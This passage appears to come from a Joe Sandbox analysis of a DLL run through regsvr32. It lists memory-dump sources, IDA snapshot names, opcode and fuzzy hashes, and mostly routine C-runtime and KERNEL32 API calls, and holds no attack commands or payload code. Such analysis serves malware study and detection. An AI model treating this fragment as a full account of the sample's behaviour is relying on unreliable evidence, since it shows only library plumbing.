• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: _getptd
• API String ID: 3186804695-0
• Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
• Instruction ID: 081e6f78cc0eb86ee038db03eb552b4559d61768b0effbca83dfb88b7109122a
• Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
• Instruction Fuzzy Hash: 85319222A1478185EB55DF2AD9193AE67E1EB96BC0F1C8136EA4D07B9ADF7CD401C700
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
• Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
• Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
• Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
• Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
• Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
• Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
• Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
• Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
• Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
Uniqueness
• Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD0F5
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD111
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD139
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD142
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD158
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD161
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD177
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD180
• GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD19E
• EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD1A7
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD1D9
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD1E8
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD240
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD260
• DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFA526A70D4,?,?,?,?,?,00007FFA526A7194), ref: 00007FFA526AD279
Strings
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
• API String ID: 3085332118-232180764
Uniqueness
Uniqueness Score: -1.00%

APIs
• CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526B07CE), ref: 00007FFA526B02F9
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526B07CE), ref: 00007FFA526B030D
• GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFA526B07CE), ref: 00007FFA526B0410
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: CompareErrorInfoLastString
• String ID:
• API String ID: 3723911898-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
• String ID:
• API String ID: 3466867069-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: free$_lock$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1575098132-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: free$ErrorInfoLast
• String ID:
• API String ID: 189849726-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
• String ID:
• API String ID: 994105223-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
• Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
Similarity
• API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
• String ID:
• API String ID: 3451773520-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE292
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE2B1
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE356
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3B5
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3F0
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE42C
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE46C
                                                                      • free.LIBCMT ref: 00007FFA526AE47A
                                                                      • free.LIBCMT ref: 00007FFA526AE49C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$Infofree
                                                                      • String ID:
                                                                      • API String ID: 1638741495-0
                                                                      • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                      • Instruction ID: b79bd0376a41900c70ae05a94ce4f7842a117a2ab4cf02893baa3e8bcb15df3d
                                                                      • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                      • Instruction Fuzzy Hash: 3A61D332A08682C6EB249B259C40179A6D5FF867A8F5C8A35DA5D47FDCDFBCD4419200
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                      • String ID:
                                                                      • API String ID: 2551688548-0
                                                                      • Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                      • Instruction ID: 33f444e0da0187ea93abecfa1ae78abfc9036419fb9cd62c93f698dae81a71b5
                                                                      • Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
                                                                      • Instruction Fuzzy Hash: 6F418121A0E682C1EA549B15EC8013962D4FF8A7C4F5CD134EA4E43FADEFBCE4659701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A8F94
                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A8FA6
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A9006
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A90BC
                                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A90D3
                                                                      • free.LIBCMT ref: 00007FFA526A90E4
                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFA526A9206), ref: 00007FFA526A9161
                                                                      • free.LIBCMT ref: 00007FFA526A9171
                                                                        • Part of subcall function 00007FFA526AE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE292
                                                                        • Part of subcall function 00007FFA526AE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE2B1
                                                                        • Part of subcall function 00007FFA526AE23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3B5
                                                                        • Part of subcall function 00007FFA526AE23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFA526AE3F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3535580693-0
                                                                      • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                      • Instruction ID: e93a7aa52b920c627ce623a401c6176657317d0c21b6cec04c66e6cf5db3b57b
                                                                      • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                      • Instruction Fuzzy Hash: D8619132A05682C6EB209F21DC8546D67D2FB46BE8B288235DA1D57FDCCFB8E8419740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetStartupInfoA.KERNEL32 ref: 00007FFA526A377D
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • GetFileType.KERNEL32 ref: 00007FFA526A38FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoSleepStartupType
                                                                      • String ID: @
                                                                      • API String ID: 1527402494-2766056989
                                                                      • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                      • Instruction ID: a433edca7d9ae361cc6e723e75260d688a524cb8d0acc753fa62a63f648d6288
                                                                      • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                      • Instruction Fuzzy Hash: 0B918D22A18682C1E7158B24DC482282BE5FB07774F698735CA7E47BD8DFBCE852D301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$_getptd
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 3432092939-699404926
                                                                      • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                      • Instruction ID: bd637ac3429172a90c8314fe3eebb1e288a879ec596e92c6c31489e7cbedb9f3
                                                                      • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                      • Instruction Fuzzy Hash: 1871E222D8D682C1FBB64B158C1437A26D1EF42754F2DC136DA5E02AD9DFACE9C4A301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _FF_MSGBANNER.LIBCMT ref: 00007FFA526A6ADF
                                                                        • Part of subcall function 00007FFA526A6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A6FCF
                                                                        • Part of subcall function 00007FFA526A334C: ExitProcess.KERNEL32 ref: 00007FFA526A335B
                                                                        • Part of subcall function 00007FFA526A309C: Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      • _errno.LIBCMT ref: 00007FFA526A6B21
                                                                      • _lock.LIBCMT ref: 00007FFA526A6B35
                                                                      • free.LIBCMT ref: 00007FFA526A6B57
                                                                      • _errno.LIBCMT ref: 00007FFA526A6B5C
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8,?,?,?,00007FFA526A2DFF), ref: 00007FFA526A6B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                      • String ID:
                                                                      • API String ID: 1354249094-0
                                                                      • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                      • Instruction ID: 279ff915f7689b6e6897f3f12e9580163a4978c1cc0d746f1adacf4e29d060a6
                                                                      • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                      • Instruction Fuzzy Hash: 0D218021E1A642C2FA64AB109C4137A62D5EF87780F0CD034E64E47ECACFBCE850A700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2D7A
                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2D88
                                                                      • SetLastError.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2DE0
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A2DB4
                                                                      • free.LIBCMT ref: 00007FFA526A2DD7
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFA526A2DC8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
